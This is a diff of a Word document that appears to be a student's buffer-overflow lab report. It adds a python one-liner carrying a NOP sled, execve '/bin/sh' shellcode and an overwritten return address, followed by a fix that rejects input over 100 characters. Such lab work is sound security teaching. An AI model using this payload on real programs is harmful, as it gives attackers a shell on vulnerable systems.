--- a/Project-0/Kimlong Seng Project-0.docx
+++ b/Project-0/Kimlong Seng Project-0.docx
@@ -11,6 +11,8 @@
       <w:r>
         <w:t>Project 0</w:t>
       </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -253,7 +255,22 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">knowing the overflow to overflow and at in our shellcode binary </w:t>
+        <w:t xml:space="preserve">knowing the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>overflow,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>we can inject the shell code</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> binary </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">into the program by using python </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -268,6 +285,42 @@
       </w:r>
       <w:r>
         <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>(python -c 'print "\x90"*40 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*47 + "\x</w:t>
+      </w:r>
+      <w:r>
+        <w:t>77</w:t>
+      </w:r>
+      <w:r>
+        <w:t>\x</w:t>
+      </w:r>
+      <w:r>
+        <w:t>c7</w:t>
+      </w:r>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"')</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -314,6 +367,215 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>To fix it, I make a function to count how many characters there are from the user input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">And if the character is over 100 it will print out message and kick the user out of the program </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14548159" wp14:editId="62DBBE30">
+            <wp:extent cx="5333269" cy="3562350"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5352114" cy="3574937"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Here is what happen if u try to enter more than 100 character</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD06840" wp14:editId="52831BB4">
+            <wp:extent cx="5943600" cy="3425825"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3425825"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
       <w:r>
         <w:br/>
       </w:r>
@@ -322,8 +584,6 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p>
